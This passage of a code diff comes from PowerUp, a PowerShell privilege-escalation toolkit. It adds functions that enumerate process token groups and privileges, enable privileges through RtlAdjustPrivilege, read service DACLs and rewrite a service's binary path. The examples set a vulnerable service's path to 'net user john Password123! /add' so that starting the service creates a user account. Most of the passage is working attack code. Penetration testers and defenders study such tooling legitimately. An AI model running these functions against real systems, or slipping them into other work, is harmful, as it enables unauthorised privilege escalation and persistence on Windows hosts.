...SE_GROUP_ENABLED 1616 3684 +S-1-5-5-0-1053459 ...NTEGRITY_ENABLED 1616 3684 +S-1-2-0 ...SE_GROUP_ENABLED 1616 3684 +S-1-18-1 ...SE_GROUP_ENABLED 1616 3684 +S-1-16-12288 1616 3684 - [OutputType('ServiceProcess.ServiceController')] - param ( - [Parameter(Position=0, Mandatory=$True, ValueFromPipeline=$True, ValueFromPipelineByPropertyName=$True)] - [Alias('ServiceName')] - [String[]] - [ValidateNotNullOrEmpty()] - $Name - ) +.EXAMPLE - BEGIN { - filter Local:Get-ServiceReadControlHandle { - [OutputType([IntPtr])] - param ( - [Parameter(Mandatory=$True, ValueFromPipeline=$True)] - [ValidateNotNullOrEmpty()] - [ValidateScript({ $_ -as 'ServiceProcess.ServiceController' })] - $Service - ) +Get-Process notepad | Get-ProcessTokenGroup - $GetServiceHandle = [ServiceProcess.ServiceController].GetMethod('GetServiceHandle', [Reflection.BindingFlags] 'Instance, NonPublic') +SID Attributes TokenHandle ProcessId +--- ---------- ----------- --------- +S-1-5-21-8901718... ...SE_GROUP_ENABLED 1892 2044 +S-1-1-0 ...SE_GROUP_ENABLED 1892 2044 +S-1-5-32-544 ...SE_FOR_DENY_ONLY 1892 2044 +S-1-5-32-545 ...SE_GROUP_ENABLED 1892 2044 +S-1-5-4 ...SE_GROUP_ENABLED 1892 2044 +S-1-2-1 ...SE_GROUP_ENABLED 1892 2044 +S-1-5-11 ...SE_GROUP_ENABLED 1892 2044 +S-1-5-15 ...SE_GROUP_ENABLED 1892 2044 +S-1-5-5-0-1053459 ...NTEGRITY_ENABLED 1892 2044 +S-1-2-0 ...SE_GROUP_ENABLED 1892 2044 +S-1-18-1 ...SE_GROUP_ENABLED 1892 2044 +S-1-16-8192 1892 2044 - $ReadControl = 0x00020000 - $RawHandle = $GetServiceHandle.Invoke($Service, @($ReadControl)) +.OUTPUTS - $RawHandle - } - } +PowerUp.TokenGroup - PROCESS { - ForEach($ServiceName in $Name) { +Outputs a custom object containing the token group (SID/attributes) for the specified process. +#> - $IndividualService = Get-Service -Name $ServiceName -ErrorAction Stop + [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSShouldProcess', '')] + [OutputType('PowerUp.TokenGroup')] + [CmdletBinding()] + Param( + [Parameter(Position = 0, ValueFromPipeline = $True, ValueFromPipelineByPropertyName = $True)] + [Alias('ProcessID')] + [UInt32] + [ValidateNotNullOrEmpty()] + $Id + ) - try { - Write-Verbose "Add-ServiceDacl IndividualService : $($IndividualService.Name)" - $ServiceHandle = Get-ServiceReadControlHandle -Service $IndividualService + PROCESS { + if ($PSBoundParameters['Id']) { + $ProcessHandle = $Kernel32::OpenProcess(0x400, $False, $Id);$LastError = [Runtime.InteropServices.Marshal]::GetLastWin32Error() + if ($ProcessHandle -eq 0) { + Write-Warning ([ComponentModel.Win32Exception] $LastError) } - catch { - $ServiceHandle = $Null - Write-Verbose "Error opening up the service handle with read control for $($IndividualService.Name) : $_" + else { + $ProcessID = $Id } + } + else { + # open up a pseudo handle to the current process- don't need to worry about closing + $ProcessHandle = $Kernel32::GetCurrentProcess() + $ProcessID = $PID + } - if ($ServiceHandle -and ($ServiceHandle -ne [IntPtr]::Zero)) { - $SizeNeeded = 0 - - $Result = $Advapi32::QueryServiceObjectSecurity($ServiceHandle, [Security.AccessControl.SecurityInfos]::DiscretionaryAcl, @(), 0, [Ref] $SizeNeeded);$LastError = [Runtime.InteropServices.Marshal]::GetLastWin32Error() - - # 122 == The data area passed to a system call is too small - if ((-not $Result) -and ($LastError -eq 122) -and ($SizeNeeded -gt 0)) { - $BinarySecurityDescriptor = New-Object Byte[]($SizeNeeded) - - $Result = $Advapi32::QueryServiceObjectSecurity($ServiceHandle, [Security.AccessControl.SecurityInfos]::DiscretionaryAcl, $BinarySecurityDescriptor, $BinarySecurityDescriptor.Count, [Ref] $SizeNeeded);$LastError = [Runtime.InteropServices.Marshal]::GetLastWin32Error() - - if (-not $Result) { - Write-Error ([ComponentModel.Win32Exception] $LastError) - } - else { - $RawSecurityDescriptor = New-Object Security.AccessControl.RawSecurityDescriptor -ArgumentList $BinarySecurityDescriptor, 0 - $Dacl = $RawSecurityDescriptor.DiscretionaryAcl | ForEach-Object { - Add-Member -InputObject $_ -MemberType NoteProperty -Name AccessRights -Value ($_.AccessMask -as $ServiceAccessRights) -PassThru - } + if ($ProcessHandle) { + [IntPtr]$hProcToken = [IntPtr]::Zero + $TOKEN_QUERY = 0x0008 + $Success = $Advapi32::OpenProcessToken($ProcessHandle, $TOKEN_QUERY, [ref]$hProcToken);$LastError = [Runtime.InteropServices.Marshal]::GetLastWin32Error() - Add-Member -InputObject $IndividualService -MemberType NoteProperty -Name Dacl -Value $Dacl -PassThru - } - } - else { - Write-Error ([ComponentModel.Win32Exception] $LastError) + if ($Success) { + $TokenGroups = Get-TokenInformation -TokenHandle $hProcToken -InformationClass 'Groups' + $TokenGroups | ForEach-Object { + $_ | Add-Member Noteproperty 'ProcessId' $ProcessID + $_ } + } + else { + Write-Warning ([ComponentModel.Win32Exception] $LastError) + } - $Null = $Advapi32::CloseServiceHandle($ServiceHandle) + if ($PSBoundParameters['Id']) { + # close the handle if we used OpenProcess() + $Null = $Kernel32::CloseHandle($ProcessHandle) } } } } -function Set-ServiceBinPath { +function Get-ProcessTokenPrivilege { <# - .SYNOPSIS +.SYNOPSIS - Sets the binary path for a service to a specified value. +Returns all privileges for the current (or specified) process ID. - Author: @harmj0y, Matthew Graeber (@mattifestation) - License: BSD 3-Clause +Author: Will Schroeder (@harmj0y) +License: BSD 3-Clause +Required Dependencies: PSReflect, Get-TokenInformation - .DESCRIPTION +.DESCRIPTION - Takes a service Name or a ServiceProcess.ServiceController on the pipeline and first opens up a - service handle to the service with ConfigControl access using the GetServiceHandle - Win32 API call. ChangeServiceConfig is then used to set the binary path (lpBinaryPathName/binPath) - to the string value specified by binPath, and the handle is closed off. +First, if a process ID is passed, then the process is opened using OpenProcess(), +otherwise GetCurrentProcess() is used to open up a pseudohandle to the current process. +OpenProcessToken() is then used to get a handle to the specified process token. The token +is then passed to Get-TokenInformation to query the current privileges for the specified +token. - Takes one or more ServiceProcess.ServiceController objects on the pipeline and adds a - Dacl field to each object. It does this by opening a handle with ReadControl for the - service with using the GetServiceHandle Win32 API call and then uses - QueryServiceObjectSecurity to retrieve a copy of the security descriptor for the service. +.PARAMETER Id - .PARAMETER Name +The process ID to enumerate token groups for, otherwise defaults to the current process. - An array of one or more service names to set the binary path for. Required. +.PARAMETER Special - .PARAMETER binPath +Switch. Only return 'special' privileges, meaning admin-level privileges. +These include SeSecurityPrivilege, SeTakeOwnershipPrivilege, SeLoadDriverPrivilege, SeBackupPrivilege, +SeRestorePrivilege, SeDebugPrivilege, SeSystemEnvironmentPrivilege, SeImpersonatePrivilege, SeTcbPrivilege. - The new binary path (lpBinaryPathName) to set for the specified service. Required. +.EXAMPLE - .OUTPUTS +Get-ProcessTokenPrivilege | ft -a + +WARNING: 2 columns do not fit into the display and were removed. + +Privilege Attributes +--------- ---------- +SeUnsolicitedInputPrivilege DISABLED +SeTcbPrivilege DISABLED +SeSecurityPrivilege DISABLED +SeTakeOwnershipPrivilege DISABLED +SeLoadDriverPrivilege DISABLED +SeSystemProfilePrivilege DISABLED +SeSystemtimePrivilege DISABLED +SeProfileSingleProcessPrivilege DISABLED +SeIncreaseBasePriorityPrivilege DISABLED +SeCreatePagefilePrivilege DISABLED +SeBackupPrivilege DISABLED +SeRestorePrivilege DISABLED +SeShutdownPrivilege DISABLED +SeDebugPrivilege SE_PRIVILEGE_ENABLED +SeSystemEnvironmentPrivilege DISABLED +SeChangeNotifyPrivilege ...EGE_ENABLED_BY_DEFAULT, SE_PRIVILEGE_ENABLED +SeRemoteShutdownPrivilege DISABLED +SeUndockPrivilege DISABLED +SeManageVolumePrivilege DISABLED +SeImpersonatePrivilege ...EGE_ENABLED_BY_DEFAULT, SE_PRIVILEGE_ENABLED +SeCreateGlobalPrivilege ...EGE_ENABLED_BY_DEFAULT, SE_PRIVILEGE_ENABLED +SeIncreaseWorkingSetPrivilege DISABLED +SeTimeZonePrivilege DISABLED +SeCreateSymbolicLinkPrivilege DISABLED - $True if configuration succeeds, $False otherwise. +.EXAMPLE - .EXAMPLE +Get-ProcessTokenPrivilege -Special - PS C:\> Set-ServiceBinPath -Name VulnSvc -BinPath 'net user john Password123! /add' +Privilege Attributes TokenHandle ProcessId +--------- ---------- ----------- --------- +SeTcbPrivilege DISABLED 2268 3684 +SeSecurityPrivilege DISABLED 2268 3684 +SeTakeOwnershipP... DISABLED 2268 3684 +SeLoadDriverPriv... DISABLED 2268 3684 +SeBackupPrivilege DISABLED 2268 3684 +SeRestorePrivilege DISABLED 2268 3684 +SeDebugPrivilege ...RIVILEGE_ENABLED 2268 3684 +SeSystemEnvironm... DISABLED 2268 3684 +SeImpersonatePri... ...RIVILEGE_ENABLED 2268 3684 - Sets the binary path for 'VulnSvc' to be a command to add a user. +.EXAMPLE - .EXAMPLE +Get-Process notepad | Get-ProcessTokenPrivilege | fl - PS C:\> Get-Service VulnSvc | Set-ServiceBinPath -BinPath 'net user john Password123! /add' +Privilege : SeShutdownPrivilege +Attributes : DISABLED +TokenHandle : 2164 +ProcessId : 2044 - Sets the binary path for 'VulnSvc' to be a command to add a user. +Privilege : SeChangeNotifyPrivilege +Attributes : SE_PRIVILEGE_ENABLED_BY_DEFAULT, SE_PRIVILEGE_ENABLED +TokenHandle : 2164 +ProcessId : 2044 - .LINK +Privilege : SeUndockPrivilege +Attributes : DISABLED +TokenHandle : 2164 +ProcessId : 2044 - https://msdn.microsoft.com/en-us/library/windows/desktop/ms681987(v=vs.85).aspx -#> +Privilege : SeIncreaseWorkingSetPrivilege +Attributes : DISABLED +TokenHandle : 2164 +ProcessId : 2044 - param ( - [Parameter(Position=0, Mandatory=$True, ValueFromPipeline=$True, ValueFromPipelineByPropertyName=$True)] - [Alias('ServiceName')] - [String[]] - [ValidateNotNullOrEmpty()] - $Name, +Privilege : SeTimeZonePrivilege +Attributes : DISABLED +TokenHandle : 2164 +ProcessId : 2044 - [Parameter(Position=1, Mandatory=$True)] - [String] - [ValidateNotNullOrEmpty()] - $binPath - ) +.OUTPUTS - BEGIN { - filter Local:Get-ServiceConfigControlHandle { - [OutputType([IntPtr])] - param ( - [Parameter(Mandatory=$True, ValueFromPipeline=$True)] - [ServiceProcess.ServiceController] - [ValidateNotNullOrEmpty()] - $TargetService - ) +PowerUp.TokenPrivilege - $GetServiceHandle = [ServiceProcess.ServiceController].GetMethod('GetServiceHandle', [Reflection.BindingFlags] 'Instance, NonPublic') +Outputs a custom object containing the token privilege (name/attributes) for the specified process. +#> - $ConfigControl = 0x00000002 + [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSShouldProcess', '')] + [OutputType('PowerUp.TokenPrivilege')] + [CmdletBinding()] + Param( + [Parameter(Position = 0, ValueFromPipeline = $True, ValueFromPipelineByPropertyName = $True)] + [Alias('ProcessID')] + [UInt32] + [ValidateNotNullOrEmpty()] + $Id, - $RawHandle = $GetServiceHandle.Invoke($TargetService, @($ConfigControl)) + [Switch] + [Alias('Privileged')] + $Special + ) - $RawHandle - } + BEGIN { + $SpecialPrivileges = @('SeSecurityPrivilege', 'SeTakeOwnershipPrivilege', 'SeLoadDriverPrivilege', 'SeBackupPrivilege', 'SeRestorePrivilege', 'SeDebugPrivilege', 'SeSystemEnvironmentPrivilege', 'SeImpersonatePrivilege', 'SeTcbPrivilege') } PROCESS { - - ForEach($IndividualService in $Name) { - - $TargetService = Get-Service -Name $IndividualService -ErrorAction Stop - try { - $ServiceHandle = Get-ServiceConfigControlHandle -TargetService $TargetService + if ($PSBoundParameters['Id']) { + $ProcessHandle = $Kernel32::OpenProcess(0x400, $False, $Id);$LastError = [Runtime.InteropServices.Marshal]::GetLastWin32Error() + if ($ProcessHandle -eq 0) { + Write-Warning ([ComponentModel.Win32Exception] $LastError) } - catch { - $ServiceHandle = $Null - Write-Verbose "Error opening up the service handle with read control for $IndividualService : $_" + else { + $ProcessID = $Id } + } + else { + # open up a pseudo handle to the current process- don't need to worry about closing + $ProcessHandle = $Kernel32::GetCurrentProcess() + $ProcessID = $PID + } - if ($ServiceHandle -and ($ServiceHandle -ne [IntPtr]::Zero)) { - - $SERVICE_NO_CHANGE = [UInt32]::MaxValue - - $Result = $Advapi32::ChangeServiceConfig($ServiceHandle, $SERVICE_NO_CHANGE, $SERVICE_NO_CHANGE, $SERVICE_NO_CHANGE, "$binPath", [IntPtr]::Zero, [IntPtr]::Zero, [IntPtr]::Zero, [IntPtr]::Zero, [IntPtr]::Zero, [IntPtr]::Zero);$LastError = [Runtime.InteropServices.Marshal]::GetLastWin32Error() - - if ($Result -ne 0) { - Write-Verbose "binPath for $IndividualService successfully set to '$binPath'" - $True - } - else { - Write-Error ([ComponentModel.Win32Exception] $LastError) - $Null + if ($ProcessHandle) { + [IntPtr]$hProcToken = [IntPtr]::Zero + $TOKEN_QUERY = 0x0008 + $Success = $Advapi32::OpenProcessToken($ProcessHandle, $TOKEN_QUERY, [ref]$hProcToken);$LastError = [Runtime.InteropServices.Marshal]::GetLastWin32Error() + if ($Success) { + Get-TokenInformation -TokenHandle $hProcToken -InformationClass 'Privileges' | ForEach-Object { + if ($PSBoundParameters['Special']) { + if ($SpecialPrivileges -Contains $_.Privilege) { + $_ | Add-Member Noteproperty 'ProcessId' $ProcessID + $_ | Add-Member Aliasproperty Name ProcessId + $_ + } + } + else { + $_ | Add-Member Noteproperty 'ProcessId' $ProcessID + $_ + } } + } + else { + Write-Warning ([ComponentModel.Win32Exception] $LastError) + } - $Null = $Advapi32::CloseServiceHandle($ServiceHandle) + if ($PSBoundParameters['Id']) { + # close the handle if we used OpenProcess() + $Null = $Kernel32::CloseHandle($ProcessHandle) } } } } -function Test-ServiceDaclPermission { +function Get-ProcessTokenType { <# - .SYNOPSIS +.SYNOPSIS - Tests one or more passed services or service names against a given permission set, - returning the service objects where the current user have the specified permissions. +Returns the token type and impersonation level. - Author: @harmj0y, Matthew Graeber (@mattifestation) - License: BSD 3-Clause +Author: Will Schroeder (@harmj0y) +License: BSD 3-Clause +Required Dependencies: PSReflect, Get-TokenInformation - .DESCRIPTION +.DESCRIPTION - Takes a service Name or a ServiceProcess.ServiceController on the pipeline, and first adds - a service Dacl to the service object with Add-ServiceDacl. All group SIDs for the current - user are enumerated services where the user has some type of permission are filtered. The - services are then filtered against a specified set of permissions, and services where the - current user have the specified permissions are returned. +First, if a process ID is passed, then the process is opened using OpenProcess(), +otherwise GetCurrentProcess() is used to open up a pseudohandle to the current process. +OpenProcessToken() is then used to get a handle to the specified process token. The token +is then passed to Get-TokenInformation to query the type and impersonation level for the +specified token. - .PARAMETER Name +.PARAMETER Id - An array of one or more service names to test against the specified permission set. +The process ID to enumerate token groups for, otherwise defaults to the current process. - .PARAMETER Permissions +.EXAMPLE - A manual set of permission to test again. One of:'QueryConfig', 'ChangeConfig', 'QueryStatus', - 'EnumerateDependents', 'Start', 'Stop', 'PauseContinue', 'Interrogate', UserDefinedControl', - 'Delete', 'ReadControl', 'WriteDac', 'WriteOwner', 'Synchronize', 'AccessSystemSecurity', - 'GenericAll', 'GenericExecute', 'GenericWrite', 'GenericRead', 'AllAccess' +Get-ProcessTokenType - .PARAMETER PermissionSet + Type ImpersonationLevel TokenHandle ProcessId + ---- ------------------ ----------- --------- + Primary Identification 872 3684 - A pre-defined permission set to test a specified service against. 'ChangeConfig', 'Restart', or 'AllAccess'. - .OUTPUTS +.EXAMPLE - ServiceProcess.ServiceController +Get-Process notepad | Get-ProcessTokenType | fl - .EXAMPLE +Type : Primary +ImpersonationLevel : Identification +TokenHandle : 1356 +ProcessId : 2044 - PS C:\> Get-Service | Test-ServiceDaclPermission +.OUTPUTS - Return all service objects where the current user can modify the service configuration. +PowerUp.TokenType - .EXAMPLE +Outputs a custom object containing the token type and impersonation level for the specified process. +#> - PS C:\> Get-Service | Test-ServiceDaclPermission -PermissionSet 'Restart' + [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSShouldProcess', '')] + [OutputType('PowerUp.TokenType')] + [CmdletBinding()] + Param( + [Parameter(Position = 0, ValueFromPipeline = $True, ValueFromPipelineByPropertyName = $True)] + [Alias('ProcessID')] + [UInt32] + [ValidateNotNullOrEmpty()] + $Id + ) - Return all service objects that the current user can restart. + PROCESS { + if ($PSBoundParameters['Id']) { + $ProcessHandle = $Kernel32::OpenProcess(0x400, $False, $Id);$LastError = [Runtime.InteropServices.Marshal]::GetLastWin32Error() + if ($ProcessHandle -eq 0) { + Write-Warning ([ComponentModel.Win32Exception] $LastError) + } + else { + $ProcessID = $Id + } + } + else { + # open up a pseudo handle to the current process- don't need to worry about closing + $ProcessHandle = $Kernel32::GetCurrentProcess() + $ProcessID = $PID + } + if ($ProcessHandle) { + [IntPtr]$hProcToken = [IntPtr]::Zero + $TOKEN_QUERY = 0x0008 + $Success = $Advapi32::OpenProcessToken($ProcessHandle, $TOKEN_QUERY, [ref]$hProcToken);$LastError = [Runtime.InteropServices.Marshal]::GetLastWin32Error() - .EXAMPLE + if ($Success) { + $TokenType = Get-TokenInformation -TokenHandle $hProcToken -InformationClass 'Type' + $TokenType | ForEach-Object { + $_ | Add-Member Noteproperty 'ProcessId' $ProcessID + $_ + } + } + else { + Write-Warning ([ComponentModel.Win32Exception] $LastError) + } - PS C:\> Test-ServiceDaclPermission -Permissions 'Start' -Name 'VulnSVC' + if ($PSBoundParameters['Id']) { + # close the handle if we used OpenProcess() + $Null = $Kernel32::CloseHandle($ProcessHandle) + } + } + } +} - Return the VulnSVC object if the current user has start permissions. - .LINK +function Enable-Privilege { +<# +.SYNOPSIS - https://rohnspowershellblog.wordpress.com/2013/03/19/viewing-service-acls/ -#> +Enables a specific privilege for the current process. - [OutputType('ServiceProcess.ServiceController')] - param ( - [Parameter(Position=0, Mandatory=$True, ValueFromPipeline=$True, ValueFromPipelineByPropertyName=$True)] - [Alias('ServiceName')] - [String[]] - [ValidateNotNullOrEmpty()] - $Name, +Author: Will Schroeder (@harmj0y) +License: BSD 3-Clause +Required Dependencies: PSReflect - [String[]] - [ValidateSet('QueryConfig', 'ChangeConfig', 'QueryStatus', 'EnumerateDependents', 'Start', 'Stop', 'PauseContinue', 'Interrogate', 'UserDefinedControl', 'Delete', 'ReadControl', 'WriteDac', 'WriteOwner', 'Synchronize', 'AccessSystemSecurity', 'GenericAll', 'GenericExecute', 'GenericWrite', 'GenericRead', 'AllAccess')] - $Permissions, +.DESCRIPTION - [String] - [ValidateSet('ChangeConfig', 'Restart', 'AllAccess')] - $PermissionSet = 'ChangeConfig' - ) +Uses RtlAdjustPrivilege to enable a specific privilege for the current process. +Privileges can be passed by string, or the output from Get-ProcessTokenPrivilege +can be passed on the pipeline. - BEGIN { +.EXAMPLE + +Get-ProcessTokenPrivilege + + Privilege Attributes ProcessId + --------- ---------- --------- + SeShutdownPrivilege DISABLED 3620 + SeChangeNotifyPrivilege ...AULT, SE_PRIVILEGE_ENABLED 3620 + SeUndockPrivilege DISABLED 3620 +SeIncreaseWorkingSetPrivilege DISABLED 3620 + SeTimeZonePrivilege DISABLED 3620 + +Enable-Privilege SeShutdownPrivilege + +Get-ProcessTokenPrivilege + + Privilege Attributes ProcessId + --------- ---------- --------- + SeShutdownPrivilege SE_PRIVILEGE_ENABLED 3620 + SeChangeNotifyPrivilege ...AULT, SE_PRIVILEGE_ENABLED 3620 + SeUndockPrivilege DISABLED 3620 +SeIncreaseWorkingSetPrivilege DISABLED 3620 + SeTimeZonePrivilege DISABLED 3620 + +.EXAMPLE + +Get-ProcessTokenPrivilege + +Privilege Attributes ProcessId +--------- ---------- --------- +SeShutdownPrivilege DISABLED 2828 +SeChangeNotifyPrivilege ...AULT, SE_PRIVILEGE_ENABLED 2828 +SeUndockPrivilege DISABLED 2828 +SeIncreaseWorkingSetPrivilege DISABLED 2828 +SeTimeZonePrivilege DISABLED 2828 + + +Get-ProcessTokenPrivilege | Enable-Privilege -Verbose +VERBOSE: Attempting to enable SeShutdownPrivilege +VERBOSE: Attempting to enable SeChangeNotifyPrivilege +VERBOSE: Attempting to enable SeUndockPrivilege +VERBOSE: Attempting to enable SeIncreaseWorkingSetPrivilege +VERBOSE: Attempting to enable SeTimeZonePrivilege + +Get-ProcessTokenPrivilege + +Privilege Attributes ProcessId +--------- ---------- --------- +SeShutdownPrivilege SE_PRIVILEGE_ENABLED 2828 +SeChangeNotifyPrivilege ...AULT, SE_PRIVILEGE_ENABLED 2828 +SeUndockPrivilege SE_PRIVILEGE_ENABLED 2828 +SeIncreaseWorkingSetPrivilege SE_PRIVILEGE_ENABLED 2828 +SeTimeZonePrivilege SE_PRIVILEGE_ENABLED 2828 + +.LINK + +http://forum.sysinternals.com/tip-easy-way-to-enable-privileges_topic15745.html +#> + + [CmdletBinding()] + Param( + [Parameter(Position = 0, Mandatory = $True, ValueFromPipeline = $True, ValueFromPipelineByPropertyName = $True)] + [Alias('Privileges')] + [ValidateSet('SeCreateTokenPrivilege', 'SeAssignPrimaryTokenPrivilege', 'SeLockMemoryPrivilege', 'SeIncreaseQuotaPrivilege', 'SeUnsolicitedInputPrivilege', 'SeMachineAccountPrivilege', 'SeTcbPrivilege', 'SeSecurityPrivilege', 'SeTakeOwnershipPrivilege', 'SeLoadDriverPrivilege', 'SeSystemProfilePrivilege', 'SeSystemtimePrivilege', 'SeProfileSingleProcessPrivilege', 'SeIncreaseBasePriorityPrivilege', 'SeCreatePagefilePrivilege', 'SeCreatePermanentPrivilege', 'SeBackupPrivilege', 'SeRestorePrivilege', 'SeShutdownPrivilege', 'SeDebugPrivilege', 'SeAuditPrivilege', 'SeSystemEnvironmentPrivilege', 'SeChangeNotifyPrivilege', 'SeRemoteShutdownPrivilege', 'SeUndockPrivilege', 'SeSyncAgentPrivilege', 'SeEnableDelegationPrivilege', 'SeManageVolumePrivilege', 'SeImpersonatePrivilege', 'SeCreateGlobalPrivilege', 'SeTrustedCredManAccessPrivilege', 'SeRelabelPrivilege', 'SeIncreaseWorkingSetPrivilege', 'SeTimeZonePrivilege', 'SeCreateSymbolicLinkPrivilege')] + [String[]] + $Privilege + ) + + PROCESS { + ForEach ($Priv in $Privilege) { + [UInt32]$PreviousState = 0 + Write-Verbose "Attempting to enable $Priv" + $Success = $NTDll::RtlAdjustPrivilege($SecurityEntity::$Priv, $True, $False, [ref]$PreviousState) + if ($Success -ne 0) { + Write-Warning "RtlAdjustPrivilege for $Priv failed: $Success" + } + } + } +} + + +function Add-ServiceDacl { +<# +.SYNOPSIS + +Adds a Dacl field to a service object returned by Get-Service. + +Author: Matthew Graeber (@mattifestation) +License: BSD 3-Clause +Required Dependencies: PSReflect + +.DESCRIPTION + +Takes one or more ServiceProcess.ServiceController objects on the pipeline and adds a +Dacl field to each object. It does this by opening a handle with ReadControl for the +service with using the GetServiceHandle Win32 API call and then uses +QueryServiceObjectSecurity to retrieve a copy of the security descriptor for the service. + +.PARAMETER Name + +An array of one or more service names to add a service Dacl for. Passable on the pipeline. + +.EXAMPLE + +Get-Service | Add-ServiceDacl + +Add Dacls for every service the current user can read. + +.EXAMPLE + +Get-Service -Name VMTools | Add-ServiceDacl + +Add the Dacl to the VMTools service object. + +.OUTPUTS + +ServiceProcess.ServiceController + +.LINK + +https://rohnspowershellblog.wordpress.com/2013/03/19/viewing-service-acls/ +#> + + [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSShouldProcess', '')] + [OutputType('ServiceProcess.ServiceController')] + [CmdletBinding()] + Param( + [Parameter(Position = 0, Mandatory = $True, ValueFromPipeline = $True, ValueFromPipelineByPropertyName = $True)] + [Alias('ServiceName')] + [String[]] + [ValidateNotNullOrEmpty()] + $Name + ) + + BEGIN { + filter Local:Get-ServiceReadControlHandle { + [OutputType([IntPtr])] + Param( + [Parameter(Mandatory = $True, ValueFromPipeline = $True)] + [ValidateNotNullOrEmpty()] + [ValidateScript({ $_ -as 'ServiceProcess.ServiceController' })] + $Service + ) + + $GetServiceHandle = [ServiceProcess.ServiceController].GetMethod('GetServiceHandle', [Reflection.BindingFlags] 'Instance, NonPublic') + $ReadControl = 0x00020000 + $RawHandle = $GetServiceHandle.Invoke($Service, @($ReadControl)) + $RawHandle + } + } + + PROCESS { + ForEach($ServiceName in $Name) { + + $IndividualService = Get-Service -Name $ServiceName -ErrorAction Stop + + try { + Write-Verbose "Add-ServiceDacl IndividualService : $($IndividualService.Name)" + $ServiceHandle = Get-ServiceReadControlHandle -Service $IndividualService + } + catch { + $ServiceHandle = $Null + Write-Verbose "Error opening up the service handle with read control for $($IndividualService.Name) : $_" + } + + if ($ServiceHandle -and ($ServiceHandle -ne [IntPtr]::Zero)) { + $SizeNeeded = 0 + + $Result = $Advapi32::QueryServiceObjectSecurity($ServiceHandle, [Security.AccessControl.SecurityInfos]::DiscretionaryAcl, @(), 0, [Ref] $SizeNeeded);$LastError = [Runtime.InteropServices.Marshal]::GetLastWin32Error() + + # 122 == The data area passed to a system call is too small + if ((-not $Result) -and ($LastError -eq 122) -and ($SizeNeeded -gt 0)) { + $BinarySecurityDescriptor = New-Object Byte[]($SizeNeeded) + + $Result = $Advapi32::QueryServiceObjectSecurity($ServiceHandle, [Security.AccessControl.SecurityInfos]::DiscretionaryAcl, $BinarySecurityDescriptor, $BinarySecurityDescriptor.Count, [Ref] $SizeNeeded);$LastError = [Runtime.InteropServices.Marshal]::GetLastWin32Error() + + if (-not $Result) { + Write-Error ([ComponentModel.Win32Exception] $LastError) + } + else { + $RawSecurityDescriptor = New-Object Security.AccessControl.RawSecurityDescriptor -ArgumentList $BinarySecurityDescriptor, 0 + $Dacl = $RawSecurityDescriptor.DiscretionaryAcl | ForEach-Object { + Add-Member -InputObject $_ -MemberType NoteProperty -Name AccessRights -Value ($_.AccessMask -as $ServiceAccessRights) -PassThru + } + Add-Member -InputObject $IndividualService -MemberType NoteProperty -Name Dacl -Value $Dacl -PassThru + } + } + else { + Write-Error ([ComponentModel.Win32Exception] $LastError) + } + $Null = $Advapi32::CloseServiceHandle($ServiceHandle) + } + } + } +} + + +function Set-ServiceBinaryPath { +<# +.SYNOPSIS + +Sets the binary path for a service to a specified value. + +Author: Will Schroeder (@harmj0y), Matthew Graeber (@mattifestation) +License: BSD 3-Clause +Required Dependencies: PSReflect + +.DESCRIPTION + +Takes a service Name or a ServiceProcess.ServiceController on the pipeline and first opens up a +service handle to the service with ConfigControl access using the GetServiceHandle +Win32 API call. ChangeServiceConfig is then used to set the binary path (lpBinaryPathName/binPath) +to the string value specified by binPath, and the handle is closed off. + +Takes one or more ServiceProcess.ServiceController objects on the pipeline and adds a +Dacl field to each object. It does this by opening a handle with ReadControl for the +service with using the GetServiceHandle Win32 API call and then uses +QueryServiceObjectSecurity to retrieve a copy of the security descriptor for the service. + +.PARAMETER Name + +An array of one or more service names to set the binary path for. Required. + +.PARAMETER Path + +The new binary path (lpBinaryPathName) to set for the specified service. Required. + +.EXAMPLE + +Set-ServiceBinaryPath -Name VulnSvc -Path 'net user john Password123! /add' + +Sets the binary path for 'VulnSvc' to be a command to add a user. + +.EXAMPLE + +Get-Service VulnSvc | Set-ServiceBinaryPath -Path 'net user john Password123! /add' + +Sets the binary path for 'VulnSvc' to be a command to add a user. + +.OUTPUTS + +System.Boolean + +$True if configuration succeeds, $False otherwise. + +.LINK + +https://msdn.microsoft.com/en-us/library/windows/desktop/ms681987(v=vs.85).aspx +#> + + [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSUseShouldProcessForStateChangingFunctions', '')] + [OutputType('System.Boolean')] + [CmdletBinding()] + Param( + [Parameter(Position = 0, Mandatory = $True, ValueFromPipeline = $True, ValueFromPipelineByPropertyName = $True)] + [Alias('ServiceName')] + [String[]] + [ValidateNotNullOrEmpty()] + $Name, + + [Parameter(Position=1, Mandatory = $True)] + [Alias('BinaryPath', 'binPath')] + [String] + [ValidateNotNullOrEmpty()] + $Path + ) + + BEGIN { + filter Local:Get-ServiceConfigControlHandle { + [OutputType([IntPtr])] + Param( + [Parameter(Mandatory = $True, ValueFromPipeline = $True)] + [ServiceProcess.ServiceController] + [ValidateNotNullOrEmpty()] + $TargetService + ) + $GetServiceHandle = [ServiceProcess.ServiceController].GetMethod('GetServiceHandle', [Reflection.BindingFlags] 'Instance, NonPublic') + $ConfigControl = 0x00000002 + $RawHandle = $GetServiceHandle.Invoke($TargetService, @($ConfigControl)) + $RawHandle + } + } + + PROCESS { + + ForEach($IndividualService in $Name) { + + $TargetService = Get-Service -Name $IndividualService -ErrorAction Stop + try { + $ServiceHandle = Get-ServiceConfigControlHandle -TargetService $TargetService + } + catch { + $ServiceHandle = $Null + Write-Verbose "Error opening up the service handle with read control for $IndividualService : $_" + } + + if ($ServiceHandle -and ($ServiceHandle -ne [IntPtr]::Zero)) { + + $SERVICE_NO_CHANGE = [UInt32]::MaxValue + $Result = $Advapi32::ChangeServiceConfig($ServiceHandle, $SERVICE_NO_CHANGE, $SERVICE_NO_CHANGE, $SERVICE_NO_CHANGE, "$Path", [IntPtr]::Zero, [IntPtr]::Zero, [IntPtr]::Zero, [IntPtr]::Zero, [IntPtr]::Zero, [IntPtr]::Zero);$LastError = [Runtime.InteropServices.Marshal]::GetLastWin32Error() + + if ($Result -ne 0) { + Write-Verbose "binPath for $IndividualService successfully set to '$Path'" + $True + } + else { + Write-Error ([ComponentModel.Win32Exception] $LastError) + $Null + } + + $Null = $Advapi32::CloseServiceHandle($ServiceHandle) + } + } + } +} + + +function Test-ServiceDaclPermission { +<# +.SYNOPSIS + +Tests one or more passed services or service names against a given permission set, +returning the service objects where the current user have the specified permissions. + 